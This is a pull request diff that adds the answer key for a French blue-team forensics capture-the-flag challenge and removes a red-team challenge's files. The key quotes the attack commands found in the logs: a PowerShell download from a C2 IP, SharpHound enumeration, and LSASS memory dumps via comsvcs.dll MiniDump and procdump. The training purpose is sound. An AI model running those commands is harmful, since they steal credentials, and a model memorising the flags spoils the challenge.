Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
50 changes: 50 additions & 0 deletions challenges/1-Blue-Team-Phishing-ELK-Sarah/Flags.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
Flag 1 — C2 (Initial Access / Command & Control)
Question : Quelle est l'adresse IP du serveur C2 contacté par le payload PowerShell ?
Flag : RootMeUp{185.243.115.23}
Trouvable : event 4688, PowerShell -Enc décodé (Base64) et boucle C2 DownloadString('http://185.243.115.23/...').

Flag 2 — Le dropper (Execution)
Question : Quel est le nom du script malveillant déposé et exécuté depuis le dossier AppData de la victime ?
Flag : RootMeUp{update.ps1}
Trouvable : event 4688, powershell.exe -ExecutionPolicy Bypass -File C:\Users\j.dupont\AppData\Roaming\update.ps1.

Flag 3 — Le patient zéro (Compromised User)
Question : Quel compte utilisateur a exécuté le PowerShell encodé initial ?
Flag : RootMeUp{j.dupont}
Trouvable : champ user de l'event 4688 du PowerShell -Enc.

Flag 4 — Reconnaissance AD (Discovery)
Question : Quel outil d'énumération Active Directory a été lancé, et avec quel nom de fichier de sortie ?
Flag : RootMeUp{SharpHound.exe:loot.zip}
Trouvable : event 4688, SharpHound.exe -c All --zipfilename loot.zip.

Flag 5 — Vol de credentials sur la workstation (Credential Access)
Question : Quelle technique LOLBin a servi à dumper la mémoire de LSASS sur WIN-ACCT01 ?
Flag : RootMeUp{comsvcs.dll:MiniDump}
Trouvable : event 4688 rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 ...lsass.dmp, corrélé à l'event 10 (accès à lsass.exe).

Flag 6 — Le pivot (Lateral Movement)
Question : Vers quel compte de service l'attaquant a-t-il pivoté pour accéder à APP-SRV01 ?
Flag : RootMeUp{svc_backup}
Trouvable : event 4648 (logon explicite target_user: svc_backup, target_host: APP-SRV01) suivi du 4624 de svc_backup sur APP-SRV01.

Flag 7 — Second dump LSASS (Credential Access / serveur)
Question : Quel outil a été utilisé pour dumper LSASS sur APP-SRV01 ?
Flag : RootMeUp{procdump.exe}
Trouvable : event 4688 procdump.exe -accepteula -ma lsass.exe, corrélé à l'event 10 sur APP-SRV01.

Flag 8 — DCSync (Credential Access / DC)
Question : Quel chiffrement de ticket Kerberos (valeur hex) trahit la requête anormale de svc_backup vers le service krbtgt ?
Flag : RootMeUp{0x12}
Trouvable : event 4769, user: svc_backup, service_name: krbtgt, ticket_encryption: 0x12 (AES256, anormal vs le 0x17/RC4 du reste du trafic).
(Alternative si tu préfères une IP : le client_ip de l'attaquant sur ces requêtes est 192.168.10.52 → RootMeUp{192.168.10.52}.)

Flag 9 — Escalade de privilèges (Privilege Escalation)
Question : À quel groupe à privilèges l'attaquant a-t-il ajouté un membre depuis svc_backup ?
Flag : RootMeUp{Domain Admins}
Trouvable : event 4728, group_name: Domain Admins, user: svc_backup.

Flag 10 — Persistance (Persistence)
Question : Quel compte a été créé sur le DC pour maintenir un accès furtif ?
Flag : RootMeUp{svc_update$}
Trouvable : event 4720 (new_account: svc_update) confirmé par le 4742 et le 5136 (ajout d'un SPN HOST/svc_update.corp.local)
22 changes: 0 additions & 22 deletions challenges/1-Blue-Team-Phishing-ELK-Sarah/GUIDE_DEPLOIEMENT.md
Original file line number Diff line number Diff line change
Expand Up @@ -359,28 +359,6 @@ L'instance peut prendre 2-3 minutes à démarrer.
> Accès : `http://100.X.X.X:<port_assigné>` (visible après démarrage)
```

### 4.3 Créer les 10 flags dans CTFd

Créer **10 challenges séparés** (ou 10 flags sur le même challenge selon ta config CTFd).
Le plus propre est de faire **un challenge par flag** dans la même catégorie :

| Challenge | Flag | Points |
|-----------|------|--------|
| FLAG 1 – IP du C2 | `FLAG{185.243.115.23}` | 50 |
| FLAG 2 – Commande PowerShell encodée | `FLAG{SQBFAFgA...}` | 100 |
| FLAG 3 – Script téléchargé | `FLAG{update.ps1}` | 100 |
| FLAG 4 – SHA256 outil énumération | `FLAG{9f86d08...}` | 150 |
| FLAG 5 – Technique MITRE dump LSASS | `FLAG{T1003.001}` | 150 |
| FLAG 6 – Compte pivot vers APP-SRV01 | `FLAG{svc_backup}` | 150 |
| FLAG 7 – Heure premier RDP APP-SRV01 | `FLAG{09:48:12}` | 200 |
| FLAG 8 – Type auth Kerberos DC | `FLAG{Kerberos_TGS}` | 250 |
| FLAG 9 – SID ajouté groupe privilégié | `FLAG{S-1-5-21-...}` | 300 |
| FLAG 10 – Compte persistant + SPN | `FLAG{svc_update$}` | 400 |

> Pour FLAG 4 : les joueurs voient `SharpHound.exe` dans les logs
> et doivent **chercher eux-mêmes le SHA256 sur VirusTotal / GitHub**.
> Le hash n'apparaît **pas** dans les logs du challenge.

---

## PARTIE 5 — Isolation des instances par équipe
Expand Down
6 changes: 0 additions & 6 deletions challenges/1-Red-Team-Binary-Vault-Jakub/.dockerignore

This file was deleted.

10 changes: 0 additions & 10 deletions challenges/1-Red-Team-Binary-Vault-Jakub/.gitignore

This file was deleted.

41 changes: 0 additions & 41 deletions challenges/1-Red-Team-Binary-Vault-Jakub/Dockerfile

This file was deleted.

60 changes: 0 additions & 60 deletions challenges/1-Red-Team-Binary-Vault-Jakub/README.md

This file was deleted.

98 changes: 0 additions & 98 deletions challenges/1-Red-Team-Binary-Vault-Jakub/challenge/vault.c

This file was deleted.

17 changes: 0 additions & 17 deletions challenges/1-Red-Team-Binary-Vault-Jakub/docker-compose.yml

This file was deleted.

6 changes: 0 additions & 6 deletions challenges/1-Red-Team-Binary-Vault-Jakub/docker-entrypoint.sh

This file was deleted.

Loading